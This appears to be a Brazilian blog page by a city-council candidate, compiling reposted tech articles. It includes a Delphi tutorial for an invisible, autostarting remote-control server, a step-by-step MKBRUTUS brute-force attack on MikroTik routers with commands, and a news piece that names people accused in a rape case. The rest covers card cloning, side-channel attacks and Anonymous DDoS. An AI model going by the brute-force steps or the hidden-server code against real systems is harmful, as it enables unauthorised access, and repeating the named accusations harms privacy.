Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista

Mr Claytonet 20666

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista
http;//mrclaytonet.vereador.site
Pelo progresso de nossa cidade chega de ser ultrapassado por outras cidades mineiras em desenvolvimento, chega de atraso. Sou Barbacenense a vida toda e nunca vejo nossa cidade progredir ta na hora de ter alguem que realmente não tem medo de lutar pelo progresso e o povo na camara municipal de Barbacena essa pessoa sou eu Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista.
http://mrclaytonet.vereador.site
Assista este video:https://www.facebook.com/mrclaytonet/videos/1400996586582682/?hc_location=ufi

Porque escolhi o numero 20666?
Por causa do Route 66 MC 🙂

Delphi: Como criar um gerenciador para sua rede

Para criarmos um programa que “gerencie” a nossa rede, seja tanto em caso como no trabalho, temos que criar dois programas: um programa servidor, que ficará nas máquinas que queremos controlar; e um programa cliente, que irá rodar na máquina que queremos usar para controlar os outros computadores.

Primeiramente, devemos criar o programa servidor. Nele colocaremos os componentes ClientSocket (Internet) e NMMsgServ (FastNet). Logo após iremos clicar no menu Project/View Source. Nos será mostrado o código base da aplicação. Devemos colocar o seguinte comando após o begin:

Application.ShowMainForm:=False;

Isso serve para que quando a aplicação seja iniciada, ela não mostre o form principal, ficando invisível ao usuário que estará utilizando o computador. Depois, devemos mudar a propriedade Port do componente NMMsgServ para a porta que você quiser, ou deixar com está (6711). Você deve mudar se existir outro programa usando esta porta ou um firewall bloqueando-a. No meu caso, deixei como 6711.

Agora, no evento OnMSG, devemos colocar o que o programa deve fazer quando receber determinada mensagem. Nesse exemplo, ao receber a mensagem “desligar”, ele irá desligar o computador. Colocarei o comando que é usado para desligar o Windows 98, mas você pode perfeitamente colocar aquela procedure que server para desligar qualquer Windows, só não coloco aqui porque ela é muito grande.

if sMsg = “desligar” then
begin
WinExec(“C:\Windows\rundll32.exe user.exe,exitwindows”,sw_hide);
end;

Ou seja, quando a mensagem “desligar” for enviada para o programa ele irá desligar o Windows 98. Você pode fazer isso e colocar um else depois e fazer com que o programa aceite outros comandos, como por exemplo:

if sMsg = “desligar” then
begin
WinExec(“C:\Windows\rundll32.exe user.exe,exitwindows”,sw_hide);
end
else
if sMsg = “monitor” then
begin
DesligaMonitor(True);
end;

Então ele irá desligar o monitor quando receber a mensagem “monitor”. Claro que do jeito que está neste exemplo, a procedure DesligaMonitor deve estar declarada antes.

Depois de colocar todas as suas funções e procedures, você pode colocar no evento OnCreate do form, um procedure que coloque seu programa no registro para iniciar junto com o Windows ou pode colocar ele como uma tarefa agendada do Windows, para que ele inicie com o Windows.

Agora, temos que criar o programa cliente, para que possamos gerenciar nossos computadores. Crie uma nova aplicação, com os componentes ClientSocket (Internet) e NMMsg (FastNet). Não esqueça de mudar a porta para a que você configurou no servidor. Se você não mudou no servidor, também não precisa mudar no cliente, pois já vai estar com 6711. Agora, coloque um Edit, um Label e um Button. No Caption do Label, coloque “Host” e no Caption do Button coloque “Conectar”. No botão Conectar, coloque o seguinte código:

procedure TForm1.Button1Click(Sender: TObject);
var
comp:string;
begin
comp:=Edit1.Text;
NMMsg1.Host:=comp;
try
NMMsg1.Connect;
ShowMessage(“Conectado.”);
except
ShowMessage(“Erro ao Conectar.”);
end;
end;

Para funcionar, você deve colocar o IP ou o nome de Host do computador que quer controlar e depois clicar em “Conectar”. Se a conexão for possível, irá aparecer uma mensagem dizendo “Conectado”, caso contrário irá dar erro. Agora estou conectado e daí? Agora, vamos colocar um outro botão e alterar o seu Caption para “Desligar”. No código do botão, coloque:

if NMMsg1.Connected=True then
NMMsg1.Disconnect;
NMMsg1.PostIt(“desligar”);
NMMsg1.Connect;

Ou seja, quando você conectar e clicar em “desligar”, o computador a que você está conectado irá desligar. Podemos colocar outro botão com o código e trocar o “desligar” por “monitor”, então o monitor do computador seria desligado.

Outra coisa interessante é que podemos fazer um cliente mais aperfeiçoado, por exemplo, que mande estes comandos para uma faixa de IPs e assim, desligar vários computadores ou desligar os monitores de todos eles. Isso é interessante em empresas ou até mesmo em casa quando se quer enconomizar um pouco de energia e configurar o programa para que mande o comando de desligar o monitor para todos os computadores na rede ao meio-dia, para economizar na energia gasta por eles e configurar para que no fim no expediente (as 7:00 por exemplo), ele mande o comando de desligar o computador para os PCs da rede, evitando que algum fique ligado e que alguém tenha que ver se todos estão desligados, poupando energia e esforços.

Logo SDCX

Anonymous divulga dados de estupradores de menina no Rio de Janeiro

Anonymous

Além das milhares de mensagens em apoio à jovem vítima de estupro coletivo na Zona Oeste do Rio de Janeiro no penúltimo sábado (21), agora o grupo de hackers Anonymous mobilizou uma campanha para buscar e expor os nomes dos 33 homens que participaram do crime. Em uma mensagem no Pastebin, serviço que permite publicar fragmentos de textos por um período ou por tempo indeterminado, o AnonOpsBrazil anunciou que vai divulgar dados de todos os envolvidos na barbárie que chocou o país nesta semana. Segundo os hackers, as informações serão postadas conforme o grupo identificar os criminosos e somente depois que o Ministério Público receber uma denúncia formal pelos policiais que estão investigando o caso. Um dos nomes divulgados pelo grupo é o de Raphael Asssis Duarte Belo, de 41 anos. Ele é o rapaz que apareceu fazendo uma selfie ao lado do corpo da adolescente de 16 anos e que foi amplamente compartilhado nas redes sociais na última terça-feira (24). Entre os dados publicados estão o nome, a idade e o estado civil dos acusados. “Estamos com mais dados em relação a ele, mas, esses dados serão entregue para as autoridades na ajuda pra localizar o estuprador. Sim, tomamos toda cautela para confirmar a identidade dele”, comentaram os hackers no comunicado, reforçando a afirmação de que tomaram cuidado para não expor nenhuma pessoa inocente. Além de Raphael, a polícia já identificou outros três homens e decretou a prisão preventiva dos quatro.

São eles Lucas Perdomo Duarte Santos, de 20 anos, com quem a menina tinha um relacionamento há três anos; Marcelo Miranda da Cruz Correa, de 18 anos; e Michel Brazil da Silva, de 20.

Veja abaixo a carta divulgada pelos hackers do Anonymous Brasil: “‘Estupradores não são doentes: são filhos saudáveis do patriarcado.’ A sociedade e o machismo impregnado nela agem muitas vezes de maneira silenciosa. Pessoas banalizam o tempo inteiro e acabam por aceitar sua naturalizacão, costumeiramente atribuindo a culpa às vítimas das opressões. Uma sociedade doente, gera pessoas doentes, assim como o caso do Rafael, que divulgou e achou graça da desgraça e covardia extrema a qual cometeu com uma jovem, ainda por cima menor de idade, junto com mais cerca de 30 homens. A exposição desta figura é muito importante para que se possa facilitar a sua localização junto às autoridades competentes, para que possam dessa maneira localizar ainda os demais envolvidos nessa barbárie.Não há, infelizmente, justiça que repare a dor e o trauma sofridos, porém, há a urgente necessidade de que indivíduos como estes não continuem soltos junto à sociedade. Pedimos que compartilhem para que possamos dessa maneira localizar e, quem sabe dessa maneira, possamos assistir ao mínimo de justiça possível dentro de uma sociedade que se despreocupa com a criação de monstros como estes. Estamos com mais dados em relação a ele, mas, esses dados serão entregue para as autoridades na ajuda pra localizar o estuprador. Sim, tomamos toda cautela para confirmar a identidade dele.”

Fontes: Anonymous Brasil (Facebook), Pastebin via Catraca Livre

 

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

BRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Veja o ataque na pratica:
01 Passo

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Verifique a versão atual do python em seguida realiza a instalação da versão 3

root@kali:~# python –version (Exibe a versão do Python)

root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

02 Passo

Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.

root@kali:~# python –version (Exibe a versão do Python)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

03 Passo

Realize o download do projeto mkbrutus

root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

04 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~# chmod -R 755 mkbrutus/

root@kali:~# cd mkbrutus/

root@kali:~/mkbrutus# ls -l

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

05 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~/mkbrutus# python3 mkbrutus.py -h

-h : Help (Ajuda)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

06 Passo

São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

07 Passo

Crie um arquivo de senhas ou realize o download de uma lista nos sites:

Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net

root@kali:~/mkbrutus# cat senhas.txt

 

Conteúdo do arquivo senhas.txt

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

08 Passo

Realize o ataque no equipamento utilizando os seguintes parâmetros.

root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt

  • mkbrutus.py : Ferramenta de Brute Force
  • 192.168.0.1 : IP do Roteador MikroTik
  • senhas.txt : Arquivo de Senhas(Wordlist)

O ataque é realizado com sucesso e o usuário e a senha são revelados:

Usuário: admin
Senha: P@ssw0rd

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:

Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa

Projeto: github.com/mkbrutusproject/mkbrutus

Fonte: 100security

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Este artigo demonstra ao público em geral que existem formas de ataque que podem ser feitas aos algoritmos criptográficos que fogem do aspecto matemático, puro e simples.

O artigo, escrito originalmente por WILLIAM BUCHANAN da Napier University, demonstra de forma inequívoca que, algoritmos supostamente seguros podem, de fato, serem atacado por métodos não convencionais – mas científicos porcerto – numa linguagem simples e acessível a todos.

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Abaixo, segue uma tradução livre feita por mim deste artigo (respeitando ao máximo o conteúdo original), preservando também as imagens que Prof.Buchanan pôs

Ao final, todos os links que embasam o artigo.


Agora a Criptografia pode ser Quebrada através das Paredes

A quebra de chaves de criptografia tem envolvido frequentemente métodos de força bruta, ou falhas de segmentação em sua implementação. Há, porém, o interesse crescente em ataques físicos indiretos  (nota: no original, Physical Side-Channel Attacks), onde há um vazamento não-intencional de informações da criptografia, tais como de radiação eletromagnética, consumo de energia, flutuações de tensão elétrica e variações do mesmo som e térmicas.

Poucas empresas atualmente protegem seus dispositivos contra ataques indiretos, especialmente se se provassem dispendiosos, e exigem extensos testes com equipamentos complexos.

Dispositivos também estão se tornando mais rápidos, e, naturalmente deles, são propensos a emitir uma quantidade crescente de emissões de rádio e eletromagnética (EM). Um processador de 2GHz, por exemplo, está rodando por volta da mesma frequência que nossos sinais de Wi-Fi (2.4 GHz), e muitas vezes os chips não são protegidos contra emissões de ondas de rádio que são um subproduto natural da operação rápida do dispositivo. Nessas altas freqüências, é geralmente difícil impedir emissões de EM para fios nas proximidades e em outros circuitos.

Ataques por Canais Laterais

Tem havido trabalhos sobre a quebra do algoritmo RSA com métodos acústicos, juntamente com variações eletromagnéticas e de tensão. Agora, os pesquisadores tomaram um significativo passo à frente, conforme documento “ECDH Key-Extraction via Low-Bandwidth Electromagnetic Attacks on PCs” (Ataques de Extração de chaves ECDH via Eletromagnetismo de Baixa-Frequência em PC’s).

Dentro deste documento, os autores descrevem a quebra do ECDH (Curva Elíptica Diffie-Hellman), que é um dos mais populares métodos de troca de chaves e é muitas vezes usado ao se conectar a sites como Microsoft Live, Google e Facebook.

No trabalho eles atacam o algoritmo de criptografia de chave pública ECDH e medem as mudanças eletromagnéticas. Este ataque usa um método “texto codificado escolhido” (nota: Choosen Ciphertext Attack, um método bastante conhecido há décadas), e uma técnica de análise de tempo-freqüência de sinal, de forma a quebrar a chave. Isso revela a chave de descriptografia em poucos segundos, vinda de uma antena em outra sala.

ECDH é agora um método popular, e é basicamente o método de troca de chaves Diffie-Hellman com o uso de métodos de Curva Elíptica:

(Nota: veja aqui uma explicação sobre Curva Elíptica)

Análise de Tensão

O trabalho de modulação em trilhas dos chips é bem documentado, para descobrimento das chaves de criptografia, onde a segurança e a proteção da chave é reduzida. Também houve trabalho sobre um “cold boot” onde os chips de memória são “congelados”, mantendo seus estados de informação/bit:

Análise Diferencial de Alimentação em cartões SIM

Até agora, todos pensamos que cartões SIM estavam seguros da maioria dos tipos de ataque.

Mas Prof. Yu-Yu, da Shanghai Jiao Tong University, tem mostrado agora que os cartões SIM 3G/4G, usando AES de 128 bits, podem ser quebrados – portanto, o pesadelo de clonagem de cartão SIM poderia se tornar realidade (vide este link).

 O acesso às chaves de criptografia SIM é um foco importante para a aplicação da Lei, e destacou-se no início do ano quando os agentes de certa Autoridade foram suspeitos de roubar bilhões de chaves de criptografia do fabricante holandês de cartões Gemalto.

Essas chaves permitiriam o acesso a mensagens de voz e dados nos telefones.

Em sua apresentação de Black Hat USA 2015 nesta semana, Prof. Yu-Yu descreveu como um método de análise diferencial de alimentação/tensão que recupera chaves de criptografia de cartões SIM, o que permite serem então clonados. No geral, demora de 10 a 40 minutos para recuperar a chave e seu método foi bem-sucedido em oito dos fabricantes mais populares de cartão SIM.

Ele usa, basicamente, um osciloscópio para capturar as mudanças de energia e um analisador de protocolo MP300-SC2, juntamente com um PC para analisar a criptografia. O trabalho usa Análise Diferencial de Alimentação (DPA – Differential Power Analysis). Com Análise de Alimentação Simples (SPA – Simple Power Analysis) monitoramos a tensão consumida pelo processador e isto pode dar dicas sobre o conteúdo dos seus registradores e BUSes.

Como usar o WhatsApp sem um número de telefone

Como usar o WhatsApp sem um número de telefone

Como usar o WhatsApp sem um número de telefone

No entanto, se você não quiser usar um número de telefone, existem maneiras de você se cadastrar no WhatsApp sem a necessidade de colocar o numero de telefone.

Ao tentar instalar o WhatsApp, uma das primeiras coisas que o aplicativo nos pede é um número de telefone para o qual mandar um código de verificação. Todas as contas deste serviço estão conectadas a um número, e tê-lo é um requisito imprescindível para poder fazer funcionar o aplicativo. Contudo, isso não significa que o cartão precise estar no dispositivo em que deseja usar o WhatsApp.

Se estiver utilizando um smartphone sem cartão SIM e quiser usar o WhatsApp neste dispositivo, você tem a opção de fazê-lo usando sua conta já criada no app ou usando um número de telefone, que esteja habilitado para receber mensagens SMS e ligações e não esteja registrado no aplicativo. Com esses métodos é possível fazer com que seu smartphone ou tablet sem cartão SIM se transforme numa extensão de uma conta já criada, podendo usar os dois dispositivos ao mesmo tempo ou simplesmente habilitá-lo para usar o App. Para isso, siga os tutoriais abaixo:

Com um número de telefone

Para começar este processo, você deve dispor de um número de telefone que esteja habilitado para receber mensagens SMS e ligações e não esteja registrado no App para propósitos de verificação e conexão à internet por wi-fi ou cabo. Siga os passos abaixo para instalar o WhatsApp num dispositivo sem SIM card.

  • Conecte o dispositivo à internet;
  • Instale o aplicativo através da Play Store ou pelo botão no final deste artigo;
  • Abra o aplicativo;
  • Aceite os termos e condições;
whatsappagree
Aceite os termos e condições do aplicativo e insira um numero de telefone válido para instalar o App
  • Insira o número de telefone que deseja usar, lembrando que o mesmo deve poder receber mensagens SMS e ligações. A mensagem SMS pode demorar até 10 minutos para chegar ao seu telefone; se o processo não acontecer em 15 min, clique em “ME LIGUE” para verificar o número através de uma ligação;
  • Insira o código de verificação e voilá: o WhatsApp está prontinho para ser usado.

A verificação só é necessária uma vez desde que o aplicativo não seja desinstalado, portanto uma vez que você começou a usar o WhatsApp, não precisa mais se preocupar com o número de telefone.

whatsapptry
Verifique o seu número através de uma mensagem SMS ou ligação

Com uma conta já existente

  • Entre no Chrome no dispositivo sem cartão SIM e acesse as configurações na parte superior direita;
  • Marque a opção Versão para desktop;
whatsappnavegador
Selecione a versão de desktop do Chrome e entre na página do WhatsApp Web.
  •  Agora, no mesmo dispositivo, vá até a página oficial do WhatsApp Web, onde encontrará um código QR;
  •  Abra o aplicativo do WhatsApp com o celular que possui o cartão SIM, vá até as configurações do canto superior direito e selecione ‘WhatsApp Web’. Em seguida, faça a leitura do código QR que aparece no outro telefone;
  • O dispositivo sem número mostrará agora todas a suas conversas e contatos, e você poderá utilizar o WhatsApp da mesma maneira que faria num computador.

Fonte: www.androidpit.com.br

O que é P2P e como ela funciona?

Alguma vez você já parou para pensar como aquele último episódio da sua série favorita foi parar na sua casa e você pode assistir? Veja aqui como funciona a incrível tecnologia das redes P2P, utilizada, por exemplo, pelos programas de torrents.

Primeiro vamos explicar o que significa esse nome/sigla: P2P significa Peer to Peer e o 2 da sigla é um trocadilho com a palavra two (2 em inglês), já em português, significa par a par.

O nome se refere ao formato à disposição dos computadores interligados à rede, onde cada computador conectado realiza as funções de cliente e servidor ao mesmo tempo, dessa forma, tudo é descentralizado, sem um único servidor centralizado que detenha o arquivo e precisa se encarregar de enviar todos os milhares de pedidos ao mesmo tempo.

Ficou complicado entender o que é cliente e servidor? Eu explico: Cliente é o nome dado ao pc que pede algo à rede, e servidor aquele que envia o pedido. Como não existe um servidor dedicado, veja que nenhum servidor de torrent armazena sequer um arquivinho, os arquivos estão na sua máquina, na minha, na do seu vizinho, naquela do japonês enlouquecido que só estuda, enfim, em qualquer local do mundo. Aqui está a genialidade deste tipo de conexão: Não há uma única fonte para o seu download (como acontece quando você baixa algo de um site), há milhões de fontes só esperando sua conexão.

O serviço P2P cria uma rede virtual entre as máquinas conectadas no momento e vasculha o HD do usuário atrás da música, vídeo ou qualquer outro documento que a pessoa esteja baixando. Além disso, o que torna a rede P2P tão eficiente é que você pode começar a baixar de uma fonte, e no momento em que esta fonte desligar sua máquina e interromper a conexão, o download recomeçará de onde parou, a partir dos dados cedidos por um outro usuário, se este novo usuário também desconectar, o processo se repetirá, ad eternum, até você completar o download.

À esquerda uma conexão convencional, à direita, uma conexão P2P

À esquerda uma conexão convencional, à direita, uma conexão P2P

Outro ponto positivo: o número de conexões efetivadas pelo sistema varia de acordo com a sua largura de banda, ou seja, quanto mais velocidade de internet, mais conexões com outros usuários, e, assim, mais velocidade de download. A rede P2P não limita a velocidade de suas transferências, somente se você quiser que ela faça isso. Mas e como funciona essa coisa de baixar um pouco de um, um pouco de outro, etc. não dá erro? Não, pois neste tipo de conexão, os arquivos a serem transferidos são divididos em pequenos pedaços e então compartilhados. Os pedaços são sempre os mesmos para a música X, ou jogo Y. Funciona assim: Você baixa um desses pedaços de arquivo e, logo após, você imediatamente passa a distribuí-lo aos outros usuários que estão fazendo o download do mesmo arquivo. Assim, evitam-se gargalos na transmissão dos dados e permite que mesmo aquela pessoa com uma conexão lenta de transferência consiga repassar o arquivo para milhares de pessoas.

Exemplificando um pouco mais: Com esse sistema de envio um usuário pode baixar até a parte 50 do seu vizinho de prédio, a parte 3453 de um mexicano e os últimos 10% de um russo louco da vodka, por exemplo. No final, o programa que você usar para baixar os arquivos irá juntar tudo em ordem e voilá: seu download estará completo na sua máquina esperando pela execução.

Veja que estou fazendo um download em minha máquina. No total o arquivo tem quase 10gb, mas veja minhas conexões: Estou pegando dados de brasileiros, japoneses, americanos, canadenses, italianos, argentinos, etc. tudo ao mesmo tempo, e é isso que me permite uma maior velocidade. De alguns eu copio o que preciso mais rapidamente, de outros, bem devagarinho, no final, a soma dá uma boa velocidade. Aaah, e notem que eu também estou enviando o mesmo arquivo (os 13% que eu já tenho) para os outros usuários que precisam destes pedaços. Deu para entender? Eu estou sendo neste momento cliente e servidor. É um verdadeiro trabalho de formiguinha, no qual a cooperação é de suma importância.

E para exemplificar o que estávamos falando antes, sobre repartir o arquivo em pedaços, este que estou baixando tem 1241 partes de 8mb cada.

Diversas formas de compartilhamento operam neste tipo de conexão: Kademlia, Torrent, Gnutela, Kad Network, SoulSeek, etc. e ela não é nova. Se você, por exemplo, já usou o Kazaa, o Emule, Ares, etc. já esteve conectado à rede P2P sem nem saber. Ela surgiu em 1999, quando o estudante Shawn Fanning lançou o Napster, inaugurando esse novo tipo de conexão e dando o pontapé inicial na era do compartilhamento de conteúdo em grande escala.

RELACIONADO A conturbada história do Pirate Bay Entre os programas que operam este tipo de conexão podemos citar vários, que desde 1999 fazem ou já fizeram muito sucesso – e polêmica (clique no link à direita e leia sobre os problemas legais enfrentados pelo The Pirate Bay). Alguns se conectavam em mais de uma rede, por exemplo, como o Emule, que se conectava à rede P2P e Kad, e foi muito popular no Brasil lá por 2003 ~ 2005, assim como o Kazaa, etc. No entanto, hoje, o mais seguro e eficiente é sem dúvidas, algum cliente torrent, como o uTorrent, programinha de menos de 1MB que permite aos seus usuários a conexão entre milhares de pc’s pelo mundo e o tráfego ilimitado de dados, com segurança e agilidade. O download pode ser feito na página oficial do desenvolvedor, clicando aqui. Depois que você instalar o programinha em sua máquina visite o tracker (local onde estão catalogados os torrents) para buscar algo a ser baixado. O melhor, na minha humilde opinião, pode ser acessado clicando aqui.

E os benefícios da rede não se restringem somente ao compartilhamento de arquivos e mídias digitais. Você sabe, por exemplo, o porquê do Skype realizar de forma tão barata uma ligação telefônica de São Paulo para Berlim, na Alemanha? É que os dados de voz são transmitidos através de uma rede P2P, que é infinitamente mais barata de ser mantida e operada do que uma rede telefônica, seja ela conectada somente por fios, ou com satélites.

Convencidos de que o P2P é um bem para a humanidade? Então, aos downloads, e por fim, algo MUITO importante: Não deixe de compartilhar aquilo que você baixou de alguém, só assim a internet sobrevive. Compartilhar é amor <3

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-las

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-las

Golpes populares e como não ser enganado com seu cartão de crédito

Com o advento da tecnologia, suas facilidades e economia de tempo, ter um cartão de crédito, que muito facilita nossas vidas, também abre outro precedente desagradável: a clonagem dos cartões.

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Os fraudadores possuem diversas táticas para fazer com que o dono do cartão caia em um golpe. Para se ter ideia de como eles atuam, os bandidos colocam um aparelho chamado “chupa-cabra” que copia as trilhas magnéticas do cartão em um caixa eletrônico de uma agência bancária, ou ainda instalam uma câmera e filmam o cliente digitando a senha no leitor de cartões.

Estes aparelhos que roubam a identificação magnética dos cartões nada mais são do que leitoras comuns alteradas para que passem a gravar estes códigos e reproduzi-los em cartões quaisquer. No entanto, este método é um tanto grosseiro para os padrões tecnológicos que temos hoje. Infelizmente, a genialidade existe para o bem e para o mal.

Como acontecem as clonagens de cartão e como evitá-las

Com a chegada dos sites bancários e das funções home-banking, o bandido só precisa encontrar um arquivo espião para fazer com que a senha e o número de cartão de crédito sejam roubados do computador do cliente. Para isso acontecer, basta um e-mail fraudulento, cujo layout é idêntico aos das instituições bancárias. Ao abri-lo ou preencher algum campo solicitado é o suficiente para que um malware (arquivo malicioso) seja instalado no seu computador e que retransmitirá seus dados para essas quadrilhas.

O processo de clonagem é mais simples do que muita gente pode imaginar. Porém, exige um arsenal de equipamentos que chegam a custar mais de 10 mil dólares. Nestes casos, o falsário não trabalha com materiais quaisquer e sim com réplicas quase idênticas aos cartões originais das operadoras mais variadas. Para fazer essa falsificação as quadrilhas utilizam impressoras de cartões, máquinas para criação de hologramas, impressão das letras em alto relevo e uma série de outros equipamentos.

As compras pela internet têm aumentado sensivelmente os números de fraudes envolvendo cartões de crédito em todo o Brasil. Os mesmos arquivos maliciosos escondidos em emails falsos roubam informações como número do cartão, data de validade e o código de segurança de três dígitos. Com esses dados, qualquer pessoa pode fazer compras no nome de quem quer que seja o dono daqueles dados. Por isso, se você costuma abrir todos os emails que chegam à sua caixa de entrada, comece a ser um pouco mais seletivo e desconfie de remetentes desconhecidos.

Abaixo relatamos alguns dos golpes mais usados e como evitá-los:

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-las

• Alguém liga para a sua casa se identificando como um funcionário da operadora do seu cartão de crédito e informa que foi feita uma compra de um objeto bastante incomum no seu nome com um valor bastante alto.

Ao responder que não fez a compra, você dará brecha para que o bandido diga que o seu cartão talvez tenha sido clonado e que é preciso fazer uma verificação. Ele pedirá que você informe o seu endereço, número do cartão e o número do PIN. Com esses dados o fraudador poderá fazer compras no seu nome a qualquer hora do dia. Ao final da ligação o suposto atendente pede que você telefone para a central de segurança da operadora do cartão informando o ocorrido, pois, certamente, já existirá uma compra no seu cartão e dessa vez ela é verdadeira e aconteceu por você ter cedido os números de segurança do seu cartão de crédito. Por isso, nunca diga a ninguém informações referentes à sua conta bancária ou cartões de débito ou crédito. Além de ser perigoso, você, sem saber, acaba colaborando com o seu prejuízo.

• Outro golpe bastante difundido é o “chupa-cabras”, ao qual nos referimos no início.

Como não podemos saber se aquela máquina de pagamentos está ou não adulterada, procure nunca permitir que o atendente leve o cartão para longe da sua vista. Toda precaução é pouca quando, o que está em jogo, é manter o seu nome limpo na praça. Por isso, sempre que for realizar pagamentos com o seu cartão, fique atento para qualquer movimentação estranha. Caso o seu cartão fique preso na máquina da loja ou no caixa eletrônico, procure anular ou cancelar a compra e comunique imediatamente o seu banco. Se utilizar o telefone da cabine do caixa, verifique se o telefone funciona. Em caso negativo, o golpe é quase certo e não aceite ajuda de nenhum estranho.

É importante que você se certifique que ninguém está observando enquanto estiver digitando a sua senha. É um direito seu exigir que as outras pessoas aguardem a vez respeitando as faixas marcadas no chão do banco. Dessa maneira você evita dores de cabeça envolvendo a segurança dos cartões e da conta bancária.

Cartões com chip: aumento na segurança?

Cartões de Crédito: Como acontecem as clonagens de cartão e como evitá-lasOs cartões com chip aumentaram de certa forma, a segurança dos usuários. Essa tecnologia unificou dois cartões em um só e evita que o cliente ande com um cartão para débito e outro para crédito como acontecia com os cartões magnéticos. Os chips possuem mais memória e fazem com que um único cartão possua as duas opções de pagamento: débito e crédito.

Um dos motivos pelos quais os cartões de chip são tão mais seguros que aqueles com tarja magnética está no fato de que essa nova tecnologia trabalha com autenticação offline, ou seja, não exige que o terminal (caixa eletrônico) esteja conectado com qualquer tipo de sistema além do que já está instalado. Esse tipo de cartão também é mais seguro no que se refere às transações feitas pela internet e dispensa a assinatura do portador, uma vez que o PIN do cartão é capaz de substituir essa necessidade.

A segurança dos chips também está no fato de que todos os dados contidos neste sistema estão criptografados. Entretanto, de nada adianta avançar cada vez mais a tecnologia para garantir a segurança dos usuários se o próprio cliente não toma os devidos cuidados com os seus cartões e documentos. Até mesmo os cartões de ônibus e metrô já passam por situação semelhante. Porém, a técnica para isso é diferente, afinal o sistema de funcionamento desses cartões é baseado em um sistema de Identificação por Frequência de Rádio – a mesma utilizada em etiquetas inteligentes em lojas.

Mas, como comentamos acima, a mesma genialidade que trabalha para a segurança, também trabalha para a criminalidade. Mesmo os cartões com chip sendo mais seguros que os que possuem tarja magnética devemos estar atentos na hora de realizar transações bancárias.

Cartões RFID usam frequências de rádio para transmitir dados. É possível usar esses cartões em lojas e restaurantes para realizar pagamentos, sem a necessidade de passar o cartão em um leitor. A tecnologia RFID também permite que ladrões obtenham informações sem precisar ver o cartão. Esse artigo lhe dirá como manter seus cartões de crédito seguros.

Fontes:

netpatrol.org
cardcom.com.br

Vingança: queda do WhatsApp faz Anonymous derrubar sites da Justiça Federal

Nesta segunda-feira 02/05/2016, o Brasil inteiro ficou sem acesso ao WhatsApp — devido a uma decisão judicial emitida por um juiz federal que atua na comarca de Lagarto, no Sergipe. Apesar de muitos consumidores optarem por utilizar métodos alternativos para continuar usando o app e outros partindo para aplicativos similares, tem muita gente sem poder se comunicar na internet. E você acha que os internautas deixariam isso barato?

É claro que não! E não demorou muito para que os hackers do grupo Anonymous atacassem. Poucos minutos após o início do bloqueio, os hackers informaram os primeiros “Tango Down” — frase utilizada após a derrubada de sites por meio de ataques DDoS — sobre a Justiça Federal. Como informado pelo perfil @AnonOpsBR no Twitter, os sites da Justiça Federal em Sergipe e do Tribunal de Justiça do Sergipe estariam inacessíveis — fato comprovado em nossas tentativas de acessar as páginas.

Mais tarde, outro grupo ligado ao Anonymous também atacou. Desta vez, os responsáveis anunciaram o ato de que haviam derrubado o site do Governo do Estado do Sergipe. Confira abaixo a mensagem publicada:

…….

Até a publicação desta matéria, todos os sites citados permaneciam inacessíveis. Ainda não há informações sobre medidas que podem ser tomadas pelos órgãos atacados.

Ubiquiti: falha expõe dispositivos conectados a esta rede

Ubiquiti: falha expõe dispositivos conectados a esta rede

As redes Ubiquiti Networks possuem um recurso de administração remota habilitado por padrão (default) e uma nova falha encontrada por pesquisadores da SEC Consult, permite que invasores identifiquem dispositivos potencialmente vulneráveis.

Houve vários relatos nos últimos meses sobre dispositivos sem fio provedor de soluções de rede Ubiquiti Networks sendo abusadas por atores maliciosos para ataques DDoS e distribuição de malware. Tais ataques são, em muitos casos, possível devido a credenciais padrão inalterados e um recurso de gerenciamento remoto que é ativado por padrão.

Pesquisadores da consultoria de TI de segurança SEC Consult recentemente descobriu que, além de o recurso de gerenciamento remoto que está disponível via SSH, HTTP e HTTPS, há uma outra falha de segurança que pode ser abusado por cibercriminosos. De acordo com especialistas, muitos dispositivos Ubiquiti tem as mesmas chaves criptográficas de difícil compreensão.

